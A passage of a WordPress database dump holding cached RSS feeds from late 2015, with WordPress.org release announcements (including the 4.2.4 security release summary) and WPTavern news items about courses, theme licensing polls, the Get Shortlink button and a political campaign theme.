Moore, Pippin Williamson, posykrat, pragunbhutani, Rachel Baker, Rami Yushuvaev, rarylson, Rastislav Lamos, rauchg, Ravinder Kumar, RC Lations, Reuben Gunday, Rian Rietveld, Ritesh Patel, Robert Chapin, Robert Dall, Rodrigo Primo, Rommel Castro, Ross Wintle, Rouven Hurling, Ryan Boren, Ryan Marks, Ryan McCue, Ryan Neudorf, Ryan Welcher, Sagar Jadhav, Sal Ferrarello, Samir Shah, santagada, Scott Kingsley Clark, Scott Reilly, Scott Taylor, scribu, scruffian, Sean Hayes, Sebastian, Sergey Biryukov, Shawn Hooper, Sheri Bigelow, Simon Wheatley, Siobhan, Stanko Metodiev, Stephane Daury (stephdau), Stephen Edgar, Steve Grunwell, Steven Word, stuartshields, Sudar Muthu, Sunny Ratilal, taka2, tharsheblows, Thor Brink, Tim Smith, tlexcellent, tmatsuur, TobiasBg, Tomas Mackevicius, TomHarrigan, Toro_Unit (Hiroshi Urabe), Toru Miki, Tracy (LilJimmi) Levesque, Tryon Eggleston, Ty Carlson, Udit Desai, Umesh Nevase, vivekbhusal, vortfu, Weston Ruter, Will Norris, willgladstone, William Earnhardt, willstedt, Yoav Farhi, Yuri Salame, Zach Wills, Zack Katz, and Zack Tollman.\n

                                                                 

                                                                \n

                                                                Special thanks go to Siobhan McKeown for producing the release video, Hugo Baeta for the design, and Jack Lenox for the voice-over.

                                                                \n

                                                                Finally, thanks to all of the contributors who provided subtitles for the release video, which at last count had been translated into 30 languages!

                                                                \n

                                                                If you want to follow along or help out, check out Make WordPress and our core development blog. Thanks for choosing WordPress. See you soon for version 4.4!

                                                                \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:39:\"\n \n \n \n \n \n \n \n\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"WordPress 4.2.4 Security and Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"https://wordpress.org/news/2015/08/wordpress-4-2-4-security-and-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 04 Aug 2015 12:10:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"4.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3827\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:397:\"WordPress 4.2.4 is now available. This is a security release for all previous versions and we strongly encourage you to update your sites immediately. This release addresses six issues, including three cross-site scripting vulnerabilities and a potential SQL injection that could be used to compromise a site, which were discovered by Marc-Alexandre Montpas of Sucuri, Helen Hou-Sandí […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Samuel Sidler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2011:\"

                                                                WordPress 4.2.4 is now available. This is a security release for all previous versions and we strongly encourage you to update your sites immediately.

                                                                \n

                                                                This release addresses six issues, including three cross-site scripting vulnerabilities and a potential SQL injection that could be used to compromise a site, which were discovered by Marc-Alexandre Montpas of Sucuri, Helen Hou-Sandí of the WordPress security team, Netanel Rubin of Check Point, and Ivan Grigorov. It also includes a fix for a potential timing side-channel attack, discovered by Johannes Schmitt of Scrutinizer, and prevents an attacker from locking a post from being edited, discovered by Mohamed A. Baset.

                                                                \n

                                                                Our thanks to those who have practiced responsible disclosure of security issues.

                                                                \n

                                                                WordPress 4.2.4 also fixes four bugs. For more information, see the release notes or consult the list of changes.

                                                                \n

                                                                Download WordPress 4.2.4 or venture over to Dashboard → Updates and simply click “Update Now.” Sites that support automatic background updates are already beginning to update to WordPress 4.2.4.

                                                                \n

                                                                Already testing WordPress 4.3? The second release candidate is now available (zip) and it contains these fixes. For more on 4.3, see the RC 1 announcement post.

                                                                \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:39:\"\n \n \n \n \n \n \n \n\n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"WordPress 4.3 Release Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2015/07/wordpress-4-3-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Jul 2015 23:50:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"4.3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3817\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:340:\"The release candidate for WordPress 4.3 is now available. We’ve made more than 100 changes since releasing Beta 4 a week ago. RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.3 on Tuesday, August 18, but we […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Konstantin Obenland\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2256:\"

                                                                The release candidate for WordPress 4.3 is now available.

                                                                \n

                                                                We’ve made more than 100 changes since releasing Beta 4 a week ago. RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.3 on Tuesday, August 18, but we need your help to get there.

                                                                \n

                                                                If you haven’t tested 4.3 yet, now is the time!

                                                                \n

                                                                Think you’ve found a bug? Please post to the Alpha/Beta support forum. If any known issues come up, you’ll be able to find them here.

                                                                \n

                                                                To test WordPress 4.3 RC1, you can use the WordPress Beta Tester plugin or you can download the release candidate here (zip).

                                                                \n

                                                                For more information about what’s new in version 4.3, check out the Beta 1, Beta 2, Beta 3, and Beta 4 blog posts.

                                                                \n

                                                                Developers, please test your plugins and themes against WordPress 4.3 and update your plugin’s Tested up to version in the readme to 4.3 before next week. If you find compatibility problems, we never want to break things, so please be sure to post to the support forums so we can figure those out before the final release.

                                                                \n

                                                                Be sure to follow along the core development blog, where we’ll continue to post notes for developers for 4.3.

                                                                \n

                                                                Drei Monate Arbeit
                                                                \nEndlich das Ziel vor Augen
                                                                \nBald hab ich Urlaub!

                                                                \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:32:\"https://wordpress.org/news/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 15 Dec 2015 21:54:02 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:6:\"x-olaf\";s:3:\"⛄\";s:13:\"last-modified\";s:29:\"Wed, 09 Dec 2015 14:54:21 GMT\";s:4:\"link\";s:63:\"; rel=\"https://api.w.org/\"\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20130911040210\";}','no'),(15650,'_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1450259642','no'),(15651,'_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1450216442','no'),(15652,'_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9','1450259644','no'),(15653,'_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: Zac Gordon to Kickstart JavaScript Master Course for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49614\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://wptavern.com/zac-gordon-to-kickstart-javascript-master-course-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3911:\"\"photophoto credit: ParisJS, May 2012(license)\n

                                                                Last week the WordPress community took to Twitter and the Treehouse forums to express disappointment at the company’s decision to fire educator Zac Gordon. According to Gordon, the company will be giving his salary to a .NET developer and will no longer create new WordPress courses, nor do they plan to update the existing courses.

                                                                \n

                                                                I contacted Ryan Carson, CEO of Treehouse, to ask about the reasoning behind the decision to reallocate resources towards other technologies and whether the company would be updating its WordPress courses. Carson declined to answer any specific questions but released the following statement:

                                                                \n

                                                                Zac has made valuable contributions to Treehouse, and we continue to wish him nothing but the best. Treehouse will continue to offer our quality WordPress content to students for the foreseeable future.

                                                                \n

                                                                The company may decide to revive its WordPress education in the future with new courses and updates but for the time being it looks like they will sell the existing courses until they are outdated.

                                                                \n

                                                                In the meantime, Zac Gordon is moving on to continue teaching WordPress via his site WPDevCasts. After attending the State of the Word address at WordCamp US, Gordon decided to seize the day by offering a JavaScript for WordPress Master Course.

                                                                \n

                                                                “As a teacher, when I heard Matt’s homework assignment, I thought, what can I do to help us all learn JavaScript?” Gordon said. “Here I was, a WordPress teacher, fresh out of work and wondering what to do next. His words really inspired me to try to do something extra special to try to give something valuable back to the community.”

                                                                \n

                                                                Gordon is working on producing the course which he said will include more than 20 individual courses and take roughy 40 hours to complete. It will cover topics such as JavaScript in Core, the REST API, major JS frameworks used with WordPress (Backbone, Angular, React), workflow tools, and walk throughs of real world examples.

                                                                \n

                                                                “My hope is that this will give everyone who goes through it a solid, high level understanding of everything they need to really get rolling as WordPress JavaScript developers,” Gordon said.

                                                                \n

                                                                Gordon has put together a group of community experts to oversee the curriculum development, including WP REST API project lead Rachel Baker, several JS-knowledgeable core contributors, and developers with real world experience using the new API. During the course of working with them, Gordon plans to open source the efforts of the advisors in a “JavaScript for WordPress Self Study Guide.”

                                                                \n

                                                                The JavaScript for WordPress Master Course will launch in early 2016. Gordon will also be launching a Kickstarter campaign on January 7th to help support the project.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 15 Dec 2015 17:55:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:109:\"WPTavern: Poll Shows Majority Consider Public Redistribution of Commercial Themes and Plugins to be Unethical\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49633\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:119:\"http://wptavern.com/poll-shows-majority-consider-public-redistribution-of-commercial-themes-and-plugins-to-be-unethical\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4290:\"\"photophoto credit: Lukasz Kowalewski\n

                                                                Four months ago, Richard Best, a lawyer who maintains a blog focused on legal matters related to WordPress and open source, published a poll asking for people’s views on the reselling of commercial themes and plugins. Best is working on a 10-chapter ebook called “A Practical Guide to WordPress and the GPL.” He created the poll to gain feedback on a contractual mechanism he is proposing to discourage the public redistribution of commercial themes and plugins.

                                                                \n

                                                                He describes the mechanism as follows:

                                                                \n

                                                                The proposed term would say that, if a customer decides to make your commercial theme or plugin available on a website for download by others, you may exercise a right to deactivate their access keys (if that’s how you’ve set things up) and to terminate their access to support and updates.

                                                                \n

                                                                Best believes that this contractual mechanism is not contrary to the GPL, because it doesn’t stop them from distributing the theme or plugin. It does, however, nullify the customer’s commercial support arrangements.

                                                                \n

                                                                That poll closed today and the results are in: Of the 121 people surveyed, 76 believe the practice of redistributing a commercial plugin or theme, for free or for profit, is unethical. An additional 10 surveyed said that they don’t know whether it’s unethical but don’t like it.

                                                                \n

                                                                Based on the results, Best concluded that there is widespread support for the inclusion of the term he outlined which would terminate a customer’s support and access to updates if they were found to be publicly redistributing the product:

                                                                \n

                                                                101 out of 121 – supported the inclusion of such a clause, as they selected this option:

                                                                \n

                                                                Yes, I would support that as I understand the business is trying to protect its investment and it poses no threat to my use of the themes or plugins.

                                                                \n

                                                                Although the number of people surveyed wasn’t particularly large, more than half of them were theme and plugin business owners. In the questions specifically targeted toward them, 47 of the 67 said they like the idea of the proposed term but 26 of the 67 said they would be concerned that the WordPress community might openly criticize them for not complying with the ‘spirit’ of the GPL.

                                                                \n

                                                                Best believes that WordPress business owners should be able to employ contractual mechanisms that don’t violate the GPL in order to protect their interests.

                                                                \n

                                                                “I think it’s undeniable that the development of robust commercial themes and plugins supports rather than detracts from the growth of the WordPress ecosystem,” he said. “Just look at Automattic’s acquisition of WooCommerce as an example or the power that Gravity Forms brings to WordPress as another.

                                                                \n

                                                                “Businesses that depend on and support the WordPress ecosystem should be able to protect their legitimate commercial interests without fear of verbal attack from those who cling to misconceptions of what the GPL does or doesn’t allow.”

                                                                \n

                                                                Best’s summary of the poll results includes a proposed clause that terminates a customer’s support and access for engaging in public redistribution. WordPress business owners are free to use/tweak the clause as necessary, but Best includes a disclaimer that he is not providing legal advice to anyone in suggesting this kind of clause.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 14 Dec 2015 23:54:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: How to Restore the Get Shortlink Button in WordPress 4.4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49627\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"http://wptavern.com/how-to-restore-the-get-shortlink-button-in-wordpress-4-4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1873:\"

                                                                Among the many changes in WordPress 4.4 in an effort to clean the interface, the Get Shortlink button is hidden from view. If you want to restore the button, check out the Shorter Links plugin developed by Rob Allen.

                                                                \n

                                                                In addition to restoring the Get Shortlink button, it gives users the ability to use custom text that overrides the default URL.

                                                                \n\"ShorterShorter Links Settings\n

                                                                If all you need is the button without additional functionality, the Bring Back The Get Shortlink Button plugin by Thorsten Frommen, is a great alternative with a descriptive name. To restore the button without using a plugin, add the following code to your theme’s functions.php file.

                                                                \n

                                                                add_filter( \'get_shortlink\', function( $shortlink ) {return $shortlink;} );

                                                                \n

                                                                Get Shortlink is a good example of WordPress hiding functionality without removing it. This allows developers to create plugins like those mentioned above to cater to users who rely on the button’s existence.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 14 Dec 2015 22:19:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Politics: A Free WordPress Theme for Political Campaigns\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49584\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"http://wptavern.com/politics-a-free-wordpress-theme-for-political-campaigns\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4276:\"

                                                                Politics is a new free theme on WordPress.org designed to support politicians, campaigns, causes, and government agencies. The theme was created by Jami Gibbs, author of the Gateway theme and founder of Rescue Themes. After just three days on WordPress.org, it is already active on more than 700 sites.

                                                                \n

                                                                \"politics-screenshot\"

                                                                \n

                                                                Politics features a homepage template with customizable sections, including a header with contact info, hero slider, featured posts, and a parallax content section. All of these sections are managed within the customizer along with options to upload a logo, set the blog layout (masonry or traditional), and customize basic theme colors. The theme also includes support for five footer widget areas.

                                                                \n

                                                                Additional theme features (such as the email signup form and donations) are added via the following recommended plugins: Give, Mailbag, Rescue Shortcodes, Jetpack, and Widget Importer & Exporter.

                                                                \n

                                                                Politics is based on Zurb’s Foundation and Underscores. It responds nicely to mobile devices for visitors checking out a campaign on the go.

                                                                \n

                                                                \"politics-mobile\"

                                                                \n

                                                                You can view a live demo of Politics on the Rescue Themes website with all the features enabled. A commercial version of the theme is available with additional sidebars, typography customization options, and WooCommerce support.

                                                                \n

                                                                The American political season is in full swing, but Gibbs didn’t create Politics with upcoming elections in mind. She designed it as a followup to her Legislator theme, which has been successful on Themeforest.

                                                                \n

                                                                “I’m sure the upcoming election year crossed my mind but I think it might actually be a little late for the political theme peak for this election cycle,” Gibbs said.

                                                                \n

                                                                “I imagine most politicians would have already sorted out their websites by now. I was really just looking for a compliment to my other political theme, Legislator. I noticed that there weren’t any political themes on the WordPress theme directory so I was focusing on that underserved audience,” she said.

                                                                \n

                                                                So far Gibbs has had success pursuing niche themes for nonprofits, politics, breweries, and e-commerce. She is one of the few Themeforest authors trying to make a difference by adhering to WordPress best practices.

                                                                \n

                                                                You can download Politics for free from WordPress.org. Demo content to populate it is available on Rescue Themes’ website along with comprehensive documentation.

                                                                \n
